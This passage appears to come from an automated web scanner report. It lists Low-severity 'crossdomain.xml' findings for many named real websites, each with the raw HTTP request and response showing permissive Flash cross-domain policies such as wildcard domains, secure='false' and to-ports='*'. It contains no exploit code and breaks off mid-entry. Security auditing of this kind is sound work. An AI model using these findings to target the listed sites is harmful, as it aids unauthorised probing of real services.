GET /crossdomain.xml HTTP/1.0 Host: www.pgatour.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:26:41 GMT Server: Apache Last-Modified: Fri, 06 Aug 2010 20:57:01 GMT Accept-Ranges: bytes Content-Length: 1774 Content-Type: application/xml Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="pga-livescoring.chester <allow-access-from domain="*.pgatour.com"/> <allow-access-from domain="*.pga.com"/> <allow-access-from domain="i.cdn.turner.com"/> <allow-access-from domain="*.cnn.com"/> <allow-access-from domain="*.turner.com"/> <allow-access-from domain="*.cnn.net"/> <allow-access-from domain="*.doubleclick.net" secure="false"/> ...[SNIP]... <allow-access-from domain="ad.doubleclick.net" secure="false"/> ...[SNIP]... <allow-access-from domain="creatives.doubleclick.net"/> <allow-access-from domain="m.2mdn.net"/> <allow-access-from domain="m2.2mdn.net"/> <allow-access-from domain="*.2mdn.net"/> <allow-access-from domain="*.i-traffic.com"/> <allow-access-from domain="ar.atwola.com"/> <allow-access-from domain="*.itraffic.com"/> <allow-access-from domain="*.agency.com"/> <allow-access-from domain="*.aol.com"/> <allow-access-from domain="*.time.com"/> <allow-access-from domain="*.VillageVoice.com"/> <allow-access-from domain="*.nymag.com"/> <allow-access-from domain="*. salon.com"/> <allow-access-from domain="*.secondthought.com"/> <allow-access-from domain="*.clk4.com"/> <allow-access-from domain="servedby.advertising.com"/> <allow-access-from domain="bannerfarm.advertising <allow-access-from domain="*.advertising.com"/> <allow-access-from domain="*.crewintegrated.com"/> <allow-access-from domain="gfx.klipmart.com"/> <allow-access-from domain="*.klipmart.com"/> <allow-access-from domain="*.viewpoint.com"/> <allow-access-from domain="*.unicast.com"/> <allow-access-from domain="*.go123ov.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.philly.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.philly.com |
HTTP/1.0 200 OK Accept-Ranges: bytes Cache-Control: max-age=3600 Content-Type: text/xml;charset=utf-8 Date: Sat, 02 Apr 2011 13:36:15 GMT Expires: Sat, 02 Apr 2011 14:36:15 GMT Last-Modified: Mon, 28 Mar 2011 08:09:32 GMT Server: ECS (dca/532A) Via: 1.0 dv-c1-r2-u7-b4:3128 (squid) X-Cache: HIT X-Server-Name: dv-c1-r3-u14-b14 Content-Length: 4529 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.philly.com" /> <allow-access-from domain="dev.www.philly.com" /> <allow-access-from domain="stage.www.philly.com" /> <allow-access-from domain="media.philly.com" /> <allow-access-from domain="cms.clickability.com" /> ...[SNIP]... <allow-access-from domain="inquirer.philly.com" /> <allow-access-from domain="www.argentumwebs.com" /> <allow-access-from domain="argentumwebs.com" /> <allow-access-from domain="www.biemedia.com" /> <allow-access-from domain="biemedia.com" /> <allow-access-from domain="support.biemedia.com" /> <allow-access-from domain="inquirer.philly.com" /> <allow-access-from domain="go.philly.com" /> <allow-access-from domain="aps1.philly.com" /> <allow-access-from domain="*.brightcove.com" /> <allow-access-from domain="rss.teamfanshop.com" /> <allow-access-from domain="feeds.teamfanshop.com" /> <allow-access-from domain="images.footballfanatics <allow-access-from domain="concepts.philly.com" /> <allow-access-from domain="http://doubleclick.net"/> ...[SNIP]... <allow-access-from domain="http://ad.doubleclick.net"/> <allow-access-from domain="http://ad.uk.doubleclick <allow-access-from domain="http://ad.ie.doubleclick <allow-access-from domain="http://ad.fr.doubleclick <allow-access-from domain="http://ad.es.doubleclick <allow-access-from domain="http://ad.it.doubleclick <allow-access-from domain="http://ad.de.doubleclick <allow-access-from domain="http://ad.nl.doubleclick <allow-access-from domain="http://ad.se.doubleclick <allow-access-from domain="http://ad.au.doubleclick <allow-access-from domain="http://ad.jp.doubleclick <allow-access-from domain="http://ad.cn.doubleclick <allow-access-from domain="http://ad.tw.doubleclick <allow-access-from domain="http://ad.hk.doubleclick <allow-access-from domain="http://creatives <allow-access-from domain="http://dfa.doubleclick <allow-access-from domain="http://dfa.doubleclick <allow-access-from domain="http://dfp.doubleclick <allow-access-from domain="http://dfp.doubleclick <allow-access-from domain="http://motifcdn <allow-access-from domain="http://motifcdn2 <allow-access-from domain="http://m.doubleclick.net"/> <allow-access-from domain="http://m.2mdn.net"/> <allow-access-from domain="http://m.uk.2mdn.net"/> <allow-access-from domain="http://m.fr.2mdn.net"/> <allow-access-from domain="http://m.de.2mdn.net"/> <allow-access-from domain="http://m.se.2mdn.net"/> <allow-access-from domain="http://m.au.2mdn.net"/> <allow-access-from domain="http://m.jp.2mdn.net"/> <allow-access-from domain="http://m.cn.2mdn.net"/> <allow-access-from domain="http://m.tw.2mdn.net"/> <allow-access-from domain="http://m.hk.2mdn.net"/> <allow-access-from domain="http://m1.doubleclick.net"/> <allow-access-from domain="http://m1.2mdn.net"/> <allow-access-from domain="http://m1.jp.2mdn.net"/> <allow-access-from domain="http://m2.doubleclick.net"/> <allow-access-from domain="http://m2.2mdn.net"/> <allow-access-from domain="http://m3.doubleclick.net"/> <allow-access-from domain="http://m3.2mdn.net"/> <allow-access-from domain="http://demo.doubleclick <allow-access-from domain="http://demo.doubleclick <allow-access-from domain="http://sandbox.dartmotif <allow-access-from domain="http://2mdn.aolcdn.com"/> <allow-access-from domain="http://static.2mdn.net"/> <allow-access-from domain="http://s0.2mdn.net"/> <allow-access-from domain="http://s1.2mdn.net"/> <allow-access-from domain="www.phrequency.com" /> <allow-access-from domain="dev.www.phrequency.com" /> <allow-access-from domain="stage.www.phrequency.com" /> <allow-access-from domain="media.phrequency.com" /> <allow-access-from domain="www.citypaper.net" /> <allow-access-from domain="dev.www.citypaper.net" /> <allow-access-from domain="stage.www.citypaper.net" /> <allow-access-from domain="media.citypaper.net" /> <allow-access-from domain="*.issuu.com" /> <allow-access-from domain="dev.kb.philly.com" /> <allow-access-from domain="stage.kb.philly.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.picnik.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.picnik.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:30:34 GMT Server: Apache/2.2.4 Last-Modified: Tue, 01 Feb 2011 19:39:18 GMT ETag: "304-b02ea580" Accept-Ranges: bytes Content-Length: 772 Cache-Control: max-age=7200 Expires: Sat, 02 Apr 2011 15:30:34 GMT P3P: CP="NOI DSP COR CUR ADM DEV OUR BUS UNI" X-Picnik-Info: h=w110.sea.picnik.com t=1301751034414528 D=165 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!--http://www.picnik.com <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.picnik.com" secure="false" /> ...[SNIP]... <allow-access-from domain="l.yimg.com" secure="false" /> ...[SNIP]... <allow-access-from domain="staging.flickr.com" secure="false" /> ...[SNIP]... <allow-access-from domain="backstage.flickr.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.playsushi.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.playsushi.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:34:50 GMT Server: Apache Last-Modified: Fri, 10 Jul 2009 19:42:18 GMT ETag: "1d98c56-124-46e5f2b Accept-Ranges: bytes Content-Length: 292 Cache-Control: max-age=18000 Expires: Sat, 02 Apr 2011 18:34:50 GMT Vary: Accept-Encoding,User Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.plscdn.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.plentyoffish |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.plentyoffish.com |
HTTP/1.1 200 OK Content-Length: 225 Content-Type: text/xml Last-Modified: Fri, 11 Sep 2009 18:23:24 GMT Accept-Ranges: bytes ETag: "9cb61ff3c33ca1:946" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:27:00 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.plentyoffish.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.pogo.com |
HTTP/1.1 200 OK Age: 89720 Date: Fri, 01 Apr 2011 12:39:58 GMT Connection: Keep-Alive Via: POGO-EDGE ETag: W/"562-1272402607000" Last-Modified: Tue, 27 Apr 2010 21:10:07 GMT Content-Type: text/xml Content-Length: 562 Server: Apache-Coyote/1.1 <?xml version="1.0" encoding="ISO-8859-1"?> <!-- This file is to allow .swfs being served from the ea and double click domains listed below to access XML data (or other services) from the domain th ...[SNIP]... <allow-access-from domain="*.pogo.com"/> <allow-access-from domain="*.pogobeta.com"/> <allow-access-from domain="*.ea.com"/> <allow-access-from domain="*.easports.com"/> <allow-access-from domain="*.pogospike.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.politico.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.politico.com |
HTTP/1.0 200 OK Server: Apache/2.2.6 (Fedora) Last-Modified: Wed, 09 Mar 2011 16:46:27 GMT ETag: "ffc69-2ce-784f3ec0" Content-Type: text/xml Cache-Control: max-age=10 Expires: Sat, 02 Apr 2011 13:27:05 GMT Date: Sat, 02 Apr 2011 13:26:55 GMT Content-Length: 718 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.politico.com" /> <allow-access-from domain="*brightcove" /> <allow-access-from domain="*.brightcove" /> <allow-access-from domain="*.brightcove.com" /> <allow-access-from domain="*.politiconetwork.com" /> <allow-access-from domain="brightcove.vo.llnwd.net" secure="true" /> ...[SNIP]... <allow-access-from domain="cache.btrll.com" secure="true" /> ...[SNIP]... <allow-access-from domain="admin.brightcove.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.google-analytics.com"/> <allow-access-from domain="*.omniture.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.politicsdaily |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.politicsdaily.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:07:08 GMT Server: Apache/2.2 Accept-Ranges: bytes Content-Length: 318 Keep-Alive: timeout=5, max=999930 Connection: Keep-Alive Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.aol.com" /> <allow-access-from domain="*.blogsmithmedia.com" /> <allow-access-from domain="*.unicast.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.poptropica.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.poptropica.com |
HTTP/1.1 200 OK Content-Type: text/xml Cache-Control: max-age=3600 Date: Thu, 09 Dec 2010 19:11:15 GMT Server: TUX/2.0 (Linux) Content-Length: 363 Accept-Ranges: bytes Last-Modified: Thu, 18 Nov 2010 18:53:18 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.potterybarn |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.potterybarn.com |
HTTP/1.0 200 OK Content-Length: 378 Content-Type: text/xml;charset=UTF-8 Set-Cookie: PBDPWWW-EC=R4233321340; expires=Sun, 03-Apr-2011 14:02:11 GMT; domain=.potterybarn.com; path=/ Set-Cookie: WSPFY=179ed7406c5f00 Set-Cookie: PBPE_SID=pbec2KSSSMJ Set-Cookie: WSIDC=EAST; domain=.potterybarn.com; path=/ Content-Language: en-US Expires: Sat, 02 Apr 2011 13:56:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 13:56:58 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.potterybarn.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.progressive |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.progressive.com |
HTTP/1.1 200 OK Connection: close Date: Sat, 02 Apr 2011 13:45:03 GMT Content-Type: text/xml Content-Location: http://www.progressive Last-Modified: Mon, 22 Oct 2007 11:22:08 GMT Accept-Ranges: bytes ETag: "0b01fc89d14c81:ca5" Server: Microsoft-IIS/6.0 P3P: CP = "CUR ADM DEV TAI PSA PSD IVAo IVDo CONo OUR OTRo IND DSP COR CAO PHY ONL UNI PUR COM FIN NAV INT DEM CNT STA GOV OTC" policyref="http://www X-Powered-By: ASP.NET Set-Cookie: SITESERVER=ID=2dc241 Set-Cookie: TLTSID=69BA113F409A7 Set-Cookie: TLTHID=69BA113F409A7 Set-Cookie: TLTUID=69BA113F409A7 Content-Length: 617 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="localhost" /> <allow-access-from domain="*.progressive.local" /> <allow-access-from domain="*.progressivedirect.local" /> <allow-access-from domain="*.progressive.com" /> <allow-access-from domain="*.progressivedirect.com" /> <allow-access-from domain="*.progressiveseguros <allow-access-from domain="*.progressiveseguros.com" /> <allow-access-from domain="*.speedera.net" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.psu.edu |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.psu.edu |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:04:02 GMT Server: Apache/1.3.37 (Unix) Last-Modified: Fri, 17 Oct 2008 10:07:40 GMT ETag: "1958-7d-48f863ec" Accept-Ranges: bytes Content-Length: 125 Connection: close Content-Type: application/xml <cross-domain-policy> <allow-access-from domain="*.psu.edu"/> <allow-access-from domain="*.wpsu.org"/> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.realage.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.realage.com |
HTTP/1.0 200 OK Server: Apache Content-Length: 2016 Content-Type: application/xml Cache-Control: max-age=427 Date: Sat, 02 Apr 2011 13:34:44 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.syrupnyc.org"/> <allow-access-from domain="*.esquire.com"/> <allow-access-from domain="*.cosmogirl.com"/> <allow-access-from domain="*.cosmopolitan.com"/> <allow-access-from domain="*.countryliving.com"/> <allow-access-from domain="*.goodhousekeeping.com"/> <allow-access-from domain="*.harpersbazaar.com"/> <allow-access-from domain="*.housebeautiful.com"/> <allow-access-from domain="*.marieclaire.com"/> <allow-access-from domain="*.misquincemag.com"/> <allow-access-from domain="*.popularmechanics.com"/> <allow-access-from domain="*.quickandsimple.com"/> <allow-access-from domain="*.redbookmag.com"/> <allow-access-from domain="*.seventeen.com"/> <allow-access-from domain="*.teenmag.com"/> <allow-access-from domain="*.thedailygreen.com"/> <allow-access-from domain="*.veranda.com"/> <allow-access-from domain="*.townandcountrymag.com"/> <allow-access-from domain="*.townandcountrytravelmag <allow-access-from domain="*.brightcove.com"/> <allow-access-from domain="*.hearstmags.com"/> <allow-access-from domain="*.realage.com"/> <allow-access-from domain="*.realbeauty.com"/> <allow-access-from domain="*.mstudio.com"/> <allow-access-from domain="*.cooliris.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.thesurvivorsclub.org" secure="false" /> ...[SNIP]... <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.doubleclick.net"/> <allow-access-from domain="*.harpersbazaar.co.uk"/> <allow-access-from domain="*.company.co.uk"/> <allow-access-from domain="*.youandyourwedding.co.uk"/> <allow-access-from domain="*.menshealth.co.uk"/> <allow-access-from domain="*.babyexpert.com"/> <allow-access-from domain="*.handbag.com"/> <allow-access-from domain="*.cosmopolitan.co.uk"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.rei.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.rei.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Thu, 10 Jul 2008 16:16:21 GMT Cache-Control: public, max-age=600, must-revalidate Expires: Wed, 30 Mar 2011 16:40:03 GMT P3P: policyref="http://www.rei Content-Type: text/xml;charset=UTF-8 Content-Language: en-US Date: Sat, 02 Apr 2011 13:55:40 GMT Content-Length: 345 Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="www.rei.com" sec ...[SNIP]... <allow-access-from domain="rei.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.rei.com" secure="true"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.reuters.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.reuters.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:32:55 GMT Server: Apache-Coyote/1.1 Expires: Sat, 02 Apr 2011 13:37:55 GMT browser-expires: Sat, 2 Apr 2011 13:32:55 GMT Content-Type: text/xml;charset=UTF-8 Content-Length: 791 Vary: Accept-Encoding Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.reuters.com" secure="false"/> ...[SNIP]... <allow-access-from domain="ad.doubleclick.net" secure="false"/> ...[SNIP]... <allow-access-from domain="ad.uk.doubleclick.net" secure="false"/> ...[SNIP]... <allow-access-from domain="m.2mdn.net" secure="false"/> ...[SNIP]... <allow-access-from domain="m2.2mdn.net" secure="false"/> ...[SNIP]... <allow-access-from domain="feedroom.com" secure="false"/> ...[SNIP]... <allow-access-from domain="creatives.doubleclick.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.cooliris.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.oho.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.metacarta.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.reverbnation |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.reverbnation.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:40:44 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8n-fips Phusion_Passenger/3.0.4 Last-Modified: Wed, 30 Sep 2009 20:43:01 GMT ETag: "23a-474d193a69f40" Accept-Ranges: bytes Content-Length: 570 Vary: Accept-Encoding Connection: close Content-Type: application/xml Set-Cookie: BIGipServerCust15535_http <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="71.120.201.8" /> <allow-access-from domain="reverbnation.com" /> <allow-access-from domain="*.reverbnation.com" /> <allow-access-from domain="tunehive.com" /> <allow-access-from domain="*.tunehive.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.rightathome |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.rightathome.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 26 Mar 2010 19:10:53 GMT Accept-Ranges: bytes ETag: "721d8e18cdca1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET MicrosoftSharePointT Date: Sat, 02 Apr 2011 14:14:09 GMT Connection: close Content-Length: 1075 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitt ...[SNIP]... <allow-access-from domain="convertlanguage.com"/> ...[SNIP]... <allow-access-from domain="*.convertlanguage.com"/> ...[SNIP]... <allow-access-from domain="www.espanol.rightathome ...[SNIP]... <allow-access-from domain="espanol.rightathome.com"/> ...[SNIP]... <allow-access-from domain="espanol.staging ...[SNIP]... <allow-access-from domain="rightathome.com"/> ...[SNIP]... <allow-access-from domain="*.rightathome.com"/> ...[SNIP]... <allow-access-from domain="enes.rightathome.com"/> ...[SNIP]... <allow-access-from domain="enes.staging.rightathome <allow-access-from domain="translate-test.right ...[SNIP]... <allow-access-from domain="test.rightathome.com"/> <allow-access-from domain="localhost"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.rivals.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.rivals.com |
HTTP/1.1 200 OK Content-Length: 221 Content-Type: text/xml Last-Modified: Tue, 15 Jan 2008 16:52:54 GMT Accept-Ranges: bytes ETag: "0b75f129757c81:718" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:46:26 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.rivals.com" /> </c ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.rockyou.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.rockyou.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:24:05 GMT Server: Apache/2.2 Last-Modified: Wed, 19 Jan 2011 02:10:58 GMT ETag: "4c0-49a29871cf080" Accept-Ranges: bytes Content-Length: 1216 Vary: Accept-Encoding,User X-RyHeader: www164.rockyou.com took D=126 microseconds to serve this request P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Connection: close Content-Type: text/xml <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.rockmyspace.com" to-ports="*" /> <allow-access-from domain="*.rockyou.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="rockmyspace.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="rockyou.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.meebo.com" to-ports="*" /> <allow-access-from domain="*.rockyou-internal.com" to-ports="*" /> <allow-access-from domain="api.msappspace.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.yahoo.net" to-ports="80" /> ...[SNIP]... <allow-access-from domain="*.yimg.com" to-ports="80" /> ...[SNIP]... <allow-access-from domain="x.mochiads.com" to-ports="80" /> ...[SNIP]... <allow-access-from domain="www.mochiads.com" to-ports="80" /> ...[SNIP]... <allow-access-from domain="www.mochimedia.com" to-ports="80" /> ...[SNIP]... <allow-access-from domain="*.rockyoucdn1.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.rockyoucdn2.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.rockyoucdn3.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.rockyoucdn4.com" to-ports="*" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.rotoworld.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.rotoworld.com |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Wed, 22 Dec 2010 20:54:50 GMT Accept-Ranges: bytes ETag: "08969791aa2cb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Content-Length: 579 Expires: Sat, 02 Apr 2011 13:58:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 13:58:31 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="166.70.44.60" /> <allow-access-from domain="*.nbcuni.com" /> <allow-access-from domain="*.clearspring.com" /> <allow-access-from domain="*.allstarstats.com" /> <allow-access-from domain="*.sandbox.com" /> <allow-access-from domain="*.sandboxplus.com" /> <allow-access-from domain="*.gannettonline.com" /> <allow-access-from domain="*.eyewonder.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.rottentomatoes |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.rottentomatoes.com |
HTTP/1.0 200 OK Date: Sat, 02 Apr 2011 13:33:07 GMT Server: Apache Last-Modified: Thu, 31 Mar 2011 23:22:02 GMT ETag: "14b" Accept-Ranges: bytes Content-Length: 331 Cache-Control: max-age=86400 Expires: Sun, 03 Apr 2011 13:33:07 GMT Vary: Accept-Encoding,User Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.rottentomatoes.com" /> <allow-access-from domain="rottentomatoes.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.roxwel.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.roxwel.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:53:07 GMT Server: Apache/2.2.16 (Unix) Vary: Accept-Encoding Content-Length: 526 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.blastro.com" /> <allow-access-from domain="*.roxwel.com" /> <allow-access-from domain="*.yallwire.com" /> <allow-access-from domain="*.brightcove.com" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.adxcel.com"/> <allow-access-from domain="*.dev.adxcel.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.salesforce.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.salesforce.com |
HTTP/1.0 200 OK Server: SFDC Vary: Accept-Encoding Content-Type: text/x-cross-domain Date: Sat, 02 Apr 2011 13:45:22 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.salesforce.com" /> <allow-access-from domain="www.force.com" /> <allow-access-from domain="developer.force.com" /> <allow-access-from domain="salesforce.vo.llnwd.net" /> <allow-access-from domain="www3.stream.co.jp" /> <allow-access-from domain="salesforce.sitestream.com" /> <allow-access-from domain="*.jellyvision-conver ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.salon.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.salon.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:40:16 GMT Server: Apache Last-Modified: Mon, 09 Nov 2009 08:58:02 GMT ETag: "fd" Accept-Ranges: bytes Content-Length: 253 Cache-Control: max-age=86400 Expires: Sun, 03 Apr 2011 13:40:16 GMT Connection: close Content-Type: text/xml <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="salon.com" /> <allow-access-from domain="www.salon.com" /> <allow-access-from domain="images.salon.com" /> <allow-access-from domain="*.salon.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.scholastic.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.scholastic.com |
HTTP/1.0 200 OK Last-Modified: Wed, 04 Nov 2009 23:57:02 GMT ETag: "09bc980aa5dca1:417f" Content-Length: 1384 Content-Type: text/xml Accept-Ranges: bytes Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:54:10 GMT Connection: close Expires: Sat, 21 Nov 2009 02:33:32 GMT <cross-domain-policy> <allow-access-from domain="*.scholastic.com" secure="false"/> <allow-access-from domain="*.brightcove.com" secure="false"/> <allow-access-from domain="scholastic.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.scholastic.net" secure="false"/> ...[SNIP]... <allow-access-from domain="progressive.playstream ...[SNIP]... <allow-access-from domain="*.thisispoint.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.interfuel.com" /> <allow-access-from domain="70.107.248.89" /> <allow-access-from domain="*.doubleclick.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.2mdn.net" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.sears.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.sears.com |
